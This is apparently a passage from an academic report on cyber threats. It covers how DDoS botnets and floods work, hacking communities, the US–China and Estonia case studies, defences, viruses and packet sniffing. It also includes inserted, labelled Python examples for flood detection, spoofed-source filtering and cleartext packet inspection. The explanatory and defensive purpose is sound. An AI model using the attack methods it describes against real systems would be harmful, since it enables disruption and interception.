Typically, when a target is bombarded with messages from hundreds of machines at the same time, it is forced to shut down for several hours. The sources of the messages are then tracked and blocked. Sites on the Internet can potentially have huge capacities for speed and memory, which require a skillful manipulation of larger numbers of computers in order to be shut down. Though some targets have a huge capacity, they remain vulnerable due to the ways attackers have adapted their techniques.

One of the most significant DDoS attacks happened in February 2000, during which several of the world’s most frequently used web sites, including Yahoo, Amazon, Buy.com, CNN, eBay, ZDNet, E Trade, and Excite, were made inaccessible to Internet users. Many victims of the DDoS attack opted not to admit being attacked in order to avoid bad press and prevent copycats. These large shopping sites lose large amounts of money when they are not operational, and such outages threaten confidence in the online economy. This DDoS attack was so severe that Internet speed worldwide was slowed down.[62]

2.2.4 Executing a Distributed DoS Attack

The method used to commit a DDoS attack like the incident in 2000 is twofold. First, the attacker must gain control over a team of computers, building a “botnet” or accumulating “zombies.” Usually the process of seizing control over Internet-connected computers is automated. An attacker discovers a flaw in the security of many systems, and performs a scan on large pieces of the Internet which finds the specific systems that contain the desired security flaw. Computers connected to university networks or other fast and persistent connections make ideal zombies because they can send the attack data faster than most systems on the Internet. It is possible for attackers to probe the Internet for potential botnet computers in such a way that even recently connected systems can be found and controlled before their owners tell anybody that they exist. People all over the planet are constantly scanning large parts of the Internet, to the point that it is almost inevitable that every system will be probed by a potential attacker, even if nobody knows about the system.[63]

Once a set of vulnerable systems is found, the attacker uses an automated tool known as an “exploit” in order to gain control of the systems. The attacker then destroys the evidence that can be used to identify the source of the attack, and installs tools that allow the system to be commanded remotely and anonymously. To form the attack group, the attacker assigns one machine as the master, while the rest of the set act as daemons under the master system’s command. With a team of computers under the attacker’s control, usually unknown to the actual owners of the breached systems, the attacker can then give the signal to the master system, which starts an attack on a specific target. The following diagrams illustrate the process of forming a botnet and attacking a system. In the first picture, the DDoS master (blue computer) reaches out to the compromised systems (magenta computers). Upon command of the DDoS master, the compromised computers flood the victim computer (red computer) and overload the system.

[61] Kessler, Gary. Defense against Distributed Denial of Service Attacks. Nov 2000. 30 Oct 2007. <http://www.garykessler.net/library/ddos.html>
[62] Garber, Lee. Denial-of-Service Attacks Rip The Internet. IEEE Computer. Apr 2000. 12-17.
[63] Know Your Enemy – Tools and Methodologies. 21 Jul 2000. 30 Oct 2007. <http://www.honeynet.org/papers/enemy/index.html>

Figure 2.1: Botnet Diagram [64]

There are several types of attack that are used to bring down systems in different ways. One common type of attack is known as a UDP flood, during which the team of computers sends generated characters to their target and requests that they be repeated back. The volume of data coming into the target system becomes so great that it uses all of its resources to receive the dummy messages and respond to them, to the point that the target system is unable to spare enough time to handle legitimate uses.

[64] Kessler, Gary. Defense against Distributed Denial of Service Attacks. Nov 2000. 30 Oct 2007. <http://www.garykessler.net/library/ddos.html>

Another common type of attack is called a SYN flood, which takes advantage of the finite memory that the target uses to remember who it is communicating with. Computers on the Internet are able to initiate transfers of large amounts of information, but must first negotiate a few details before the information can be exchanged. In a SYN flood attack, the team of attack systems each initiates many bogus connections with the target system, forcing the victim to fill up its memory with the false connection information. Once the target's memory is full, it is no longer able to initiate the connections it needs to communicate with its true users.

In addition, there is a style of attack known as the “smurf”, which is executed by sending a large number of computers a “ping” message, but forging the return address so that each pinged system sends its reply to a victim system, overwhelming it with information until it cannot process valid requests. A “ping” is a message used by computers to check if they can still contact each other: one computer sends and the other replies, so that the system knows that the network is working correctly. When used for an attack, a ping message is sent, but the sender is forged, so that the receiver directs its reply to the target provided by the attacker, rather than sending the ping replies to the true source of the message. This final type of attack is unique in that the team of computers does not need to be breached by the attacker and fully controlled, because ping messages are a standard service present on most computers. The messages sent are small compared to other types of attacks, making “smurf” style DoS attacks less dangerous than the flooding techniques.[65]
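As an added example (not code from the original report), the following Python detector applies the three descriptions above to a constructed sample of packet-summary records as a defender at the victim would see them: it estimates a SYN-flood half-open backlog per target, counts UDP traffic aimed at the echo and chargen services that answer whatever they receive, and flags smurf-style ICMP echo replies that the victim never asked for. The one-line record format, the addresses (RFC 5737 documentation ranges) and the thresholds are assumptions chosen for this illustration.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed address of the defended host (RFC 5737 documentation range).
VICTIM = "198.51.100.10"

@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str    # "tcp", "udp" or "icmp"
    dport: int    # destination port; 0 for icmp
    detail: str   # tcp flags ("S", "SA", "A"), icmp type, or "-"

def parse_line(line: str) -> Packet:
    """Parse one constructed record: '<src> <dst> <proto> <dport> <detail>'."""
    src, dst, proto, dport, detail = line.split()
    return Packet(src, dst, proto, int(dport), detail)

def detect_syn_flood(packets: List[Packet], min_half_open: int = 20) -> Dict[str, Tuple[int, int]]:
    """SYN flood: per target, estimate the half-open backlog as client SYNs never
    followed by the client's handshake ACK, and count distinct SYN sources (many
    sources = distributed).  Returns {target: (half_open, sources)} over threshold."""
    syns, acks, sources = Counter(), Counter(), defaultdict(set)
    for p in packets:
        if p.proto != "tcp":
            continue
        if p.detail == "S":
            syns[p.dst] += 1
            sources[p.dst].add(p.src)
        elif p.detail == "A":
            acks[p.dst] += 1
    result = {}
    for dst, n in syns.items():
        half_open = max(0, n - acks[dst])
        if half_open >= min_half_open:
            result[dst] = (half_open, len(sources[dst]))
    return result

def detect_udp_echo_flood(packets: List[Packet], min_packets: int = 20) -> Dict[str, int]:
    """UDP flood as described above: traffic aimed at the echo (7) and chargen (19)
    services, which answer whatever they receive.  Returns {target: packet_count}."""
    hits = Counter(p.dst for p in packets if p.proto == "udp" and p.dport in (7, 19))
    return {dst: n for dst, n in hits.items() if n >= min_packets}

def detect_smurf(packets: List[Packet], local_host: str, min_replies: int = 20) -> Optional[Tuple[int, int]]:
    """Smurf as seen from the victim: ICMP echo replies from hosts this machine
    never pinged.  Returns (reply_count, distinct_sources) or None if below threshold."""
    pinged = {p.dst for p in packets
              if p.proto == "icmp" and p.src == local_host and p.detail == "echo-request"}
    unsolicited = [p for p in packets
                   if p.proto == "icmp" and p.dst == local_host
                   and p.detail == "echo-reply" and p.src not in pinged]
    if len(unsolicited) < min_replies:
        return None
    return len(unsolicited), len({p.src for p in unsolicited})

def build_sample() -> List[str]:
    """Constructed traffic: a little legitimate activity plus one of each flood."""
    lines = []
    for i in range(5):  # five normal three-way handshakes to port 80
        client = f"203.0.113.{i + 1}"
        lines += [f"{client} {VICTIM} tcp 80 S",
                  f"{VICTIM} {client} tcp {40000 + i} SA",
                  f"{client} {VICTIM} tcp 80 A"]
    for i in range(30):  # SYN flood: 30 zombies, one SYN each, never an ACK
        lines.append(f"192.0.2.{i + 1} {VICTIM} tcp 80 S")
    for i in range(25):  # UDP flood aimed at the chargen service
        lines.append(f"192.0.2.{i + 1} {VICTIM} udp 19 -")
    lines.append(f"{VICTIM} 203.0.113.50 icmp 0 echo-request")  # one genuine ping
    lines.append(f"203.0.113.50 {VICTIM} icmp 0 echo-reply")
    for i in range(40):  # smurf: replies from hosts the victim never pinged
        lines.append(f"192.0.2.{100 + i} {VICTIM} icmp 0 echo-reply")
    return lines

def run_detections(lines: List[str]) -> Dict[str, object]:
    """Run all three detectors over the records and return their findings."""
    packets = [parse_line(line) for line in lines]
    return {"syn_flood": detect_syn_flood(packets),
            "udp_flood": detect_udp_echo_flood(packets),
            "smurf": detect_smurf(packets, VICTIM)}

if __name__ == "__main__":
    for name, finding in run_detections(build_sample()).items():
        print(f"{name}: {finding}")
```

The half-open estimate deliberately ignores the victim's own SYN-ACKs, so the five legitimate handshakes cancel out and only the thirty never-completed SYNs remain.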

2.2.5 Hacking Communities

Gathering groups of compromised systems for committing DoS attacks and engaging in other forms of Internet-based disruption has grown into a widespread activity on the Internet. Hackers have formed groups which allow them to develop skills, align themselves with different interests, and conduct cyber-warfare. Many hacker groups are based on ideology or loyalty to a country, but diverse hacker teams containing members from all over the planet are also common. In these communities, hackers can be found bragging about their achievements, making demands, exchanging attack techniques, and even selling access to breached computers and stolen credit cards. Usually, these hacking groups are passionate private citizens operating without the instruction of any government, though some governments are criticized for encouraging the activities of these groups.[66]

Understanding how these communities work helps the effort to deal with their threats. Often, a hacker will discover a vulnerability that is likely to be present in many computers, and will use chat rooms and bulletin services to publish that information to others. Hackers quickly develop scripts which can be traded and executed to take advantage of security flaws and seize control over the vulnerable systems. Often, groups develop programs which automate and simplify the process of breaching a system so that a large number of attackers who might be unfamiliar with the details of the software flaw can still use it to gain control over systems. With the help of these communities, potential attackers do not need to develop much technical expertise, but instead only need to know how to find exploit scripts and use tools provided by others. The community then allows hackers to specialize in specific tools or vulnerabilities. The attack on major websites in 2000 was conducted using a community tool known as trinoo.[67]

[65] Garber, Lee. Denial-of-Service Attacks Rip The Internet. IEEE Computer. Apr 2000. 12-17.
[66] Know Your Enemy – Motives. 21 Jul 2000. 30 Oct 2007. <http://www.honeynet.org/papers/motives/index.html?

2.2.6 Case Study: United States and China Cyber-Conflict in 2001

When groups within the hacking community align themselves with conflicting interests, situations can quickly evolve into “cyber-warfare”. An incident between hackers in the United States and China happened in April of 2001, when an American spy plane and a Chinese jet collided over the South China Sea, killing the Chinese pilot and forcing the American plane to land in China. Once news of the incident was out, hackers from both countries began attacking each other's systems, often breaching them and leaving messages to their enemies. The incident attracted the attention of Wired Magazine, which described the attacks as a “private war” and “cyber-retaliation”. The hackers from both countries were not supported by their states, but rather were amateur computer hackers who channeled their anger over the airplane collision into an effort to ruin foreign information services.[68][69]

The attacks were mostly against web and email servers, but also included viruses and DDoS attacks. Two non-critical web sites maintained by the US Navy were defaced by Chinese hackers, replacing the original pages with protests relating to the crash. A commercial American web site was replaced with pictures of the killed Chinese pilot, the Chinese flag, and the statement “As we are Chinese, we love our motherland and its people deeply. We are so indignant about the intrusion from the imperialism. The only thing we could say is that, when we are needed, we are ready to devote anything to our motherland, even including our lives.”[70] American hackers committed similar defacements on many Chinese servers as well, including messages taunting the Chinese and demands that China return the American plane and its passengers. The messages that appeared on Chinese hacked sites were diverse: some criticized the press and the US government for taking the incidents too seriously, while others made dangerous threats. The following example of a hacked Chinese web site from the conflict demonstrates many of the concerns raised by cyber-warfare:

Figure 2.2: Defaced Website

[67] Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool. 21 Oct 1999. University of Washington. <http://staff.washington.edu/dittrich/misc/trinoo.analysis>
[68] Delio, Michelle. Crackers Expand Private War. 18 Apr 2001. Wired Magazine. 30 Oct 2002. <http://www.wired.com/politics/law/news/2001/04/43134?currentPage=2>
[69] Delio, Michelle. A Chinese Call to Hack the US. 11 Apr 2001. Wired Magazine. 30 Oct 2002. <http://www.wired.com/politics/law/news/2001/04/42982?currentPage=2>
[70] Feds Warn of May Day Attacks on US Web Sites. 26 Apr 2001. CNN. 30 Oct 2002. <http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html>

With such messages appearing on hacked web sites, and attacks happening on other types of servers as well, the National Infrastructure Protection Center issued a warning to American networks to expect an increase in cyber-attacks from China. The incident happened during a week which contained several dates of historical significance in China, including May Day, Youth Day, and the anniversary of NATO bombing the Chinese Embassy in Yugoslavia. Youth Day in China commemorates protests against foreign aggression, which magnified hostile feelings in the wake of the airplane collision and cyber-conflict. Despite the cyber-conflict, relations between the United States and China remained civil: China accepted the United States' regrets over the killed pilot and returned the crew operating the plane, and both governments prevented the conflict from escalating beyond cyber-space.[71]

2.2.7 Defense against DoS Attacks

The threat of DoS attacks paralyzing computer systems, coupled with diplomatic crises like the incident with the Chinese jet collision, has led to further consideration of what can be done to prevent cyber-damage. Denial of Service attacks present new technical challenges for experts attempting to protect their systems and identify offenders. Currently, a combination of technology and human vigilance is employed to defend against DoS. DoS is an actively researched area, with a wide variety of proposed solutions available. The costs of implementing these solutions change dramatically with the scale of the system being defended. There are also published suggestions that apply to Internet Service Providers and the networks that form the core information paths on the Internet.

2.2.8 Defending Individual Systems

The first weak point that can be improved is the common personal computer run by most of the population. Personal computers are usually the vulnerable systems which attackers are able to commandeer en masse and use to commit their decentralized attacks. Much to the frustration of larger systems which depend heavily on the Internet and spend major resources protecting themselves, large sets of commonly weak computers can still overwhelm protected systems. Reducing the number of vulnerable systems that attackers can seize control of is possible through several relatively simple tools and practices. Users need to keep their systems up to date. Many software packages automate the update process so that security fixes are applied regularly, while others require that the user regularly check the Internet for updates and download them. Updating software can be difficult for many computer users, but improvements to the update process can reduce the weak systems available to attackers. Another practice which can reduce vulnerability is for users to disable software which they do not use. By running the bare minimum of programs which attackers can communicate with and exploit, attackers will have fewer ways to take control of remote systems and use them to cause harm. Disabling unneeded software on a computer can also be difficult, but can be made easier if distributors of computers package them with default settings that run few exploitable programs and automate the update process.

[71] Feds Warn of May Day Attacks on US Web Sites. 26 Apr 2001. CNN. 30 Oct 2002. <http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html>

Software placed on personal systems can also improve protections against DoS attacks. The most common tools of system protection are currently virus scanners and firewalls, both of which help to reduce the number of systems which can be infiltrated. A firewall protects a system by limiting which of its processes can communicate with the network. A system that has fewer processes that remote users can communicate with has fewer ways by which attackers may take control of it. Virus scanners can also be used as a way to reduce DoS attacks, because many viruses are designed to seize control of computers and commit DoS attacks automatically. Attackers often use mixed methods of cyber-attack, which take advantage of vulnerabilities in one area that cascade into vulnerabilities in another. Defenses against DoS attacks thus require defenses against other styles of computer attack, such as viruses.

2.2.9 Defending Local Networks

At the local network level, defense can be improved by using Intrusion Detection Systems and logging tools. Intrusion Detection Systems monitor networks for suspicious traffic and warn administrators of possible attacks. Detection can be adjusted for specific levels of caution, but the warnings provided by such systems require experienced administrators who know how to respond to them appropriately. Sometimes Intrusion Detection warnings are false alarms, but the systems are still helpful in protecting networks.[72] A variety of tools exist which log the activity of systems, allowing administrators to notice when their systems have changed unexpectedly, and aid in tracing the source of attacks. Logging can also act as a deterrent to attackers who worry about being caught. Hackers put a lot of effort into escaping detection by tampering with activity logs, but logging tools have responded to this tampering by developing more resistant logging systems. Local networks could also be made more secure by enforcing stricter rules on passwords, requiring that they be used and are not easily guessed.

2.2.10 Defending Extended Networks

On the wide area network level, many solutions to attacks have been proposed, and some solutions are already in place. Filtering at the core of the Internet, known as Ingress and Egress filtering, helps to prevent attack messages from being broadcast. Ingress and Egress filters work by comparing the source and destination of data packets with maps of the network, and refuse to forward data that could not possibly have traveled through the route that it is found on, which reduces the amount of data traversing the Internet with forged source information. Changes to the core of the Internet are seen as the last resort, because of the far-reaching effects that the changes may have. Cooperation among the interconnected networks allows for attacks to be limited more efficiently. During a DoS attack, attacked systems work to block the data floods at their sources by tracing the messages down the pathways and requesting that certain messages be blocked at each intersection of the network. DoS attacks can be limited if their messages are blocked closer to their sources, but this requires rapid response across long distances and collaboration between business competitors.[73]

[72] Ptacek, Thomas & Newsham, Timothy. Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. Jan 1998. Secure Networks Inc. 30 Oct 2007. <http://insecure.org/stf/secnet_ids/secnet_ids.html>
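As an added example (not code from the original report), the following Python model shows the source-address plausibility check that the ingress and egress filters described above perform: a router holds a map of which prefixes legitimately sit behind each interface and refuses to forward a packet whose source address could not have arrived on the interface it was seen on. The interface names, the prefixes (RFC 5737 documentation ranges) and the sample packets are constructed for the illustration.

```python
import ipaddress
from typing import Dict, List, Tuple

# Constructed network map for an edge router: interface -> prefixes that
# legitimately sit behind it.  "uplink" carries the default route (0.0.0.0/0).
NETWORK_MAP = {
    "eth0": ["192.0.2.0/24", "198.51.100.0/25"],   # customer A
    "eth1": ["203.0.113.0/24"],                     # customer B
    "uplink": ["0.0.0.0/0"],                        # the rest of the Internet
}

# Address blocks that should never appear as a source on a routed link
# ("this network", private, loopback, link-local, multicast).
UNROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4")]

class SourceAddressFilter:
    """Ingress/egress source-address plausibility check (the filtering
    described above): forward a packet only if its source could really
    have arrived on the interface it was seen on."""

    def __init__(self, network_map: Dict[str, List[str]]) -> None:
        self.map = {iface: [ipaddress.ip_network(p) for p in prefixes]
                    for iface, prefixes in network_map.items()}
        # Every prefix we own directly (everything except the default route).
        self.internal = [p for prefixes in self.map.values()
                         for p in prefixes if p.prefixlen > 0]

    def ingress(self, iface: str, src: str) -> Tuple[bool, str]:
        """Packet entering on `iface` with source `src`: is the source plausible?"""
        addr = ipaddress.ip_address(src)
        if any(addr in n for n in UNROUTABLE):
            return False, "unroutable source address"
        prefixes = self.map[iface]
        if not any(addr in p for p in prefixes):
            return False, f"source is not behind {iface}"
        # On the default-route interface, a source from one of our own
        # prefixes can only be forged: that address lives on the inside.
        if any(p.prefixlen == 0 for p in prefixes) and any(addr in p for p in self.internal):
            return False, "internal source arriving from outside"
        return True, "ok"

    def egress(self, src: str) -> Tuple[bool, str]:
        """Packet leaving toward the uplink: only our own prefixes may be sources."""
        addr = ipaddress.ip_address(src)
        if any(addr in p for p in self.internal):
            return True, "ok"
        return False, "source is not one of our prefixes"

def audit(records: List[Tuple[str, str, str]]) -> List[Tuple[str, str, bool, str]]:
    """Apply the filter to (direction, interface, source) records; returns
    (direction, source, forward?, reason) for each."""
    flt = SourceAddressFilter(NETWORK_MAP)
    out = []
    for direction, iface, src in records:
        ok, why = flt.ingress(iface, src) if direction == "in" else flt.egress(src)
        out.append((direction, src, ok, why))
    return out

SAMPLE = [  # constructed packets: (direction, interface seen on, source address)
    ("in", "eth0", "192.0.2.7"),          # customer A host, genuine
    ("in", "eth0", "203.0.113.9"),        # customer A forging customer B's address
    ("in", "eth1", "10.1.1.1"),           # private address, never valid here
    ("in", "uplink", "198.51.100.200"),   # outside host (not in our /25), plausible
    ("in", "uplink", "192.0.2.7"),        # outside host forging one of our addresses
    ("out", "uplink", "203.0.113.9"),     # our customer sending out, genuine
    ("out", "uplink", "198.51.100.200"),  # not ours: forged outbound traffic
]

if __name__ == "__main__":
    for direction, src, ok, why in audit(SAMPLE):
        print(f"{direction:3} {src:16} {'forward' if ok else 'drop   '} {why}")
```

The two forged cases in the sample are exactly the traffic that cannot be traced back once it is past this router, which is why the text calls for the check to happen as close to the source as possible.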

2.2.11 Case Study: Estonia DDoS Attacked by Russia

In April of 2007, Estonia relocated a monument of a bronze World War II Russian soldier from the central square of its capital city, Tallinn. The relocation of this statue enraged Russians and started riots in Tallinn, and also incited DDoS attacks against Estonian government and banking services. Estonia has developed a strong dependence on the Internet, and has declared Internet access a fundamental human right. Estonia has developed what they call the “paperless government”, which operates largely over computer networks and allows citizens to vote online. The Internet infrastructure has led to Estonians referring to their country as “E-stonia” and has become a source of pride for the country.[74]

In response to the relocation of the Russian monument, attacks started against the Estonian foreign minister's web site, then spread to include all government institutions and key businesses. Russia was accused of launching the attack, and the Estonian Minister of Justice claimed the attacks had been traced to computers in Moscow belonging to the Russian government. Independent experts did not find convincing evidence that Russia orchestrated the DDoS attacks. Estonia called for technical assistance from NATO as its banks and government services were flooded. The attack lasted about a week, during which economic activity in the country was slowed down, and the government was without Internet communication. Eventually, Estonia had to cut off its Internet connections with other countries so that its population could access the needed government services. This had the side effect of making bank transactions with other countries difficult. On defending against the attack, Marty Lindner, a senior member of the technical staff at the Computer Emergency Response Team (CERT), said: “In the case of Estonia, they were only targeting 12 or 13 distinct Web sites, but the collateral damage was the national bandwidth resources. In the big scheme of things, short of getting people outside the country to filter the attack traffic, there wasn’t much somebody in Estonia could do but hold on for the ride.” In response to the incident, the European Union began discussing possible agreements that could help mitigate damage caused by DoS attacks.[75]

[73] Chang, Rocky. Defending Against Flooding-Based Distributed Denial of Service Attacks: A Tutorial. IEEE Communications Magazine. Oct 2002. 42-51.
[74] Lesk, Michael. The New Front Line: Estonia Under Cyber Assault. IEEE Security & Privacy. Jul/Aug 2007. 76-79.
[75] Goth, Greg. The New Politics of DDoS Attacks. IEEE Distributed Systems Online. Aug 2007. 1-4.

2.3 Computer Viruses

Computer viruses are a subset of malware, which is broadly defined as any unwanted and problematic software running on a computer system. What separates a virus from other undesirable software is that viruses are made to self-replicate and spread to other computers. Most viruses are malicious programs written by computer hackers, though recently certain software distributed by businesses has been classified as a virus by some sources. Computer viruses are a thoroughly researched sector of cyber security, led mostly by companies selling software designed to combat viruses.

The practice of creating and distributing viruses has existed since the mid-1980s, though sources differ on when exactly it started due to differing opinions on what exactly constitutes a virus. Over time, virus production has grown increasingly sophisticated, and programs have been designed to cause a variety of negative effects. Viruses can be harmless pranks, causing nothing more than an annoying message, but are also capable of causing massive data loss, disrupting communication, and allowing attackers to control a computer remotely.[76]

2.3.1 Types of Viruses

As new viruses are developed, security experts have classified them into categories by their behavior. The following terms describe subsets of computer viruses.

Traditional Virus: These programs alter existing software on a computer so that when executed, the virus will attempt to insert itself into more pieces of software, resembling biological viruses spreading an infection.

Worm: Software that relies on system vulnerabilities to replicate and spread is referred to as a worm. Worms are distinguished from other viruses in that they do not exist as parts of existing software, but rather as self-contained programs that propagate through security exploits.

Trojan Horse: Programs that trick the user into executing them by masquerading as a file that the user wants are referred to as Trojans. Trojans are unique in that they spread and infect computers by using social manipulation.

Rootkit: Software which is designed to run at the highest level of access on a system, and use administrative permissions to hide its existence, is known as a rootkit. Rootkits often have the ability to escape detection and take full control of the system.[77]

2.3.2 Effects of Viruses

Each type of virus is characterized by the way it spreads to other systems. The actual effect the virus has on a system once it is infected is called the “payload”. The payloads of viruses vary greatly, allowing them to be used as pranks or dangerous weapons. Common virus payloads include offensive messages, forcing the system to send spam messages to others, allowing a hacker to control the system remotely, erasing potentially critical data, intercepting sensitive information, and even forcing the system to commit a DoS attack.

[76] Highland, Harold Joseph. A history of computer viruses -- Introduction. Computers & Security. Vol 16, Issue 5. 1997. 412-415. <http://www.sciencedirect.com/science/article/B6V8G-3SX269W-2P/2/e96ee1d35ae6e62abd338c29a32234a7>
[77] Purdue University. Virus Terminology. 2005. 1 Dec 2005. <http://www.purdue.edu/securepurdue/steam/help/view.cfm?KBTopicID=210>

2.3.3 Defense against Viruses

Detection and removal of viruses is a heavily researched discipline. A large industry has grown for the development of tools to eliminate viruses before they can cause damage. Professionals work constantly to track viruses as they spread and automate the process of removing them for their customers. A virus scanner is a popular type of software which attempts to scan computers for viruses and assist in their removal. Hackers and security professionals are in a race to improve their tools. Hackers have a strategic advantage against security professionals in that they can create new viruses and use them to cause damage before the virus is discovered and the scanner is updated to detect and remove it.

Virus scanning software is handicapped in the effort to eliminate viruses because it must be updated constantly to be equipped to handle the new threats that are constantly emerging. There is an inevitable lag involved in the process of developing scanning capabilities for every new virus that gets created, and hackers are using increasingly clever methods to circumvent virus scans. Many virus scanners have the capability to detect new viruses by closely observing the functions that the system is performing. Scanners have limited prediction capabilities that are sometimes capable of detecting and removing newly developed viruses, so that when new viruses share the same patterns of behavior as familiar viruses they can be found and eliminated.[78]

Figure 2.3: Virus Scanner Interface [79]

The development of new tools to detect and eliminate viruses is active and thriving, along with warning systems that enable computer users to anticipate viruses as they spread. With warnings in place, often describing how the virus arrives and how to notice if a system has been infected, users are better equipped to prevent infection and reduce damage. The main problems in defense against computer viruses at the moment are systems which use no virus scanning, scanners that are not updated for new viruses, and users who are easily tricked into infecting their computers.

[78] Nachenberg, Carey. "Computer Virus-antivirus Coevolution." Communications of the ACM 40.1 (1997): 46-51.
[79] US-CERT. Home Computer Security - Examples. 2002. 1 Nov 2005. <http://www.cert.org/homeusers/HomeComputerSecurity/examples.html>

2.4 Packet Sniffing

Packet sniffing is a network analysis technique used to monitor traffic between devices on a network. It is used extensively by network administrators, and has a number of legitimate uses. In the hands of a subversive computer user, however, packet sniffing becomes a useful tool for obtaining sensitive data without penetrating a computer network’s security measures. In order to understand how packet sniffing works, its uses both harmful and helpful, as well as its limitations and caveats, a few key concepts must be defined.

2.4.1 Data Streams and Packets

The Ethernet connections that exist between computers are far from perfect, and, in order to compensate for lost data, many data transfer protocols break the data into small, contained packets of information. On the other end, the computer receiving the data easily pieces it back together, and immediately recognizes which packets were dropped.

The packets themselves are small and self-contained, with “header” information, which details where the packet goes in relation to other packets, its size, and so on, as well as diagnostic information used to ensure the packet was received in its entirety.

Data streams are the lines of packets that stretch between the source and destination. When packet systems are used on a “connectionless” system, such as the Internet, the packets may take multiple paths to their destination in order to optimize the connection for speed and minimize packet loss.

2.4.2 File Transfer Protocols

Different actions on the Internet use different file transfer protocols to guide how the computers in a network package information for transfer. For example, web surfing uses the HyperText Transfer Protocol (HTTP) to deliver the source code. Web-based email services such as Hotmail and GMail, however, may use the IMAP4 or POP3 systems.

This information is relevant to this topic because different file transfer protocols devote different levels of attention to security. IMAP4 and POP3, the previously mentioned email protocols, for example, make no attempt to encrypt the body of the email, meaning that merely intercepting a packet is enough for a sniffer to obtain and read a piece of that email.
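As an added example (not code from the original report), the following Python code shows what the packet described above looks like to anyone who can see it on the wire: it decodes a constructed IPv4/TCP packet, verifies the IP header checksum (the “diagnostic information” the text mentions), and reports whether the well-known port belongs to a protocol that carries its content in the clear, such as POP3 or IMAP4, or to a TLS-protected counterpart, which is the audit a defender runs to find cleartext mail traffic. The packet bytes, the addresses and the port table are constructed for this illustration.

```python
import ipaddress
import struct
from typing import Dict, Optional, Tuple

# Well-known TCP ports of the protocols the text mentions and whether each
# carries its content in the clear.  Constructed table for this example.
SERVICES: Dict[int, Tuple[str, Optional[bool]]] = {
    80: ("http", True), 110: ("pop3", True), 143: ("imap4", True),
    443: ("https", False), 993: ("imaps", False), 995: ("pop3s", False),
}

def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: 16-bit one's-complement sum, complemented.
    Run over a header that already carries its checksum, it returns 0 if intact."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int,
                   payload: bytes, flags: int = 0x18) -> bytes:
    """Constructed test input: a minimal IPv4 + TCP frame with no options.
    The TCP checksum is left at zero; this example verifies only the IP header."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 1, (5 << 12) | flags, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, 6, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]  # fill checksum
    return hdr + tcp + payload

def inspect(frame: bytes) -> Dict[str, object]:
    """What a sniffer sees: decode the IP and TCP headers, check the IP
    checksum, and classify the service by its well-known port."""
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", frame[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4
    checksum_ok = ipv4_checksum(frame[:ihl]) == 0
    tcp = frame[ihl:total_len]
    sport, dport, seq, _ack, off_flags, _win, _tcsum, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    data_offset = (off_flags >> 12) * 4
    flag_bits = off_flags & 0x3F
    flags = "".join(name for bit, name in ((1, "F"), (2, "S"), (4, "R"), (8, "P"), (16, "A"), (32, "U"))
                    if flag_bits & bit)
    port = dport if dport in SERVICES else sport   # the server side is the well-known port
    service, cleartext = SERVICES.get(port, ("unknown", None))
    return {
        "src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
        "ttl": ttl, "checksum_ok": checksum_ok, "sport": sport, "dport": dport,
        "seq": seq, "flags": flags, "service": service, "cleartext": cleartext,
        "payload": tcp[data_offset:],
    }

# Constructed sample: a POP3 server greeting, readable to anyone on the hub.
POP3_FRAME = build_ipv4_tcp("198.51.100.5", "192.0.2.20", 110, 51000,
                            b"+OK POP3 server ready\r\n")
# The same server on the TLS-protected port: the payload bytes would be opaque.
IMAPS_FRAME = build_ipv4_tcp("198.51.100.5", "192.0.2.20", 993, 51001, b"\x17\x03\x01")

if __name__ == "__main__":
    for frame in (POP3_FRAME, IMAPS_FRAME):
        info = inspect(frame)
        print(f"{info['src']}:{info['sport']} -> {info['dst']}:{info['dport']} "
              f"{info['service']} cleartext={info['cleartext']} "
              f"checksum_ok={info['checksum_ok']} payload={info['payload']!r}")
```

A flipped byte anywhere in the IP header makes the checksum verification fail, which is how the receiver notices a damaged packet; the TCP payload is returned exactly as it sits on the wire.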

2.4.3 Networking Schemes

2.4.3.1 Ethernet Networks

Most wired (as opposed to wireless) computer networks use an Ethernet configuration, either configured in a Local Area Network with cables physically connecting each device, or connected to an outside connection, such as ADSL or Cable, to the Internet. Networks may also use a hybrid of these. Local Area Networks theoretically restrict connections to computers that are physically connected into the network. When one or more of those computers also has a connection to the Internet, however, a skilled user may communicate with any or all computers on that network, provided no firewall exists, or it has been compromised.

Packet visibility in Local Area Networks is based largely on the physical layout of the Ethernet network. When computers are connected together using devices called “hubs”, each member of the network may monitor all of the traffic going through the hub. Hubs take the information sent from each member of the network and send it to every other member. Switches, however, are designed to isolate network members from each other unless they are communicating directly, though many packet-sniffing programs are designed to overcome this function.

2.4.3.2 WiFi Networks

WiFi networks allow computers to communicate wirelessly, using radio signals. WiFi connections are based on the 802.11 standard developed by IEEE, which is commonly seen in -b and -g varieties. Computer users can use WiFi connections to connect to the Internet through access points while in “hotspots”, or connect directly to other computers with WiFi cards to establish “peer-to-peer” (ad hoc) communications. Today, many businesses offer free WiFi on their premises offering unfettered access to the Internet, with traffic controlled only by User Agreements posted in the buildings with various degrees of visibility.

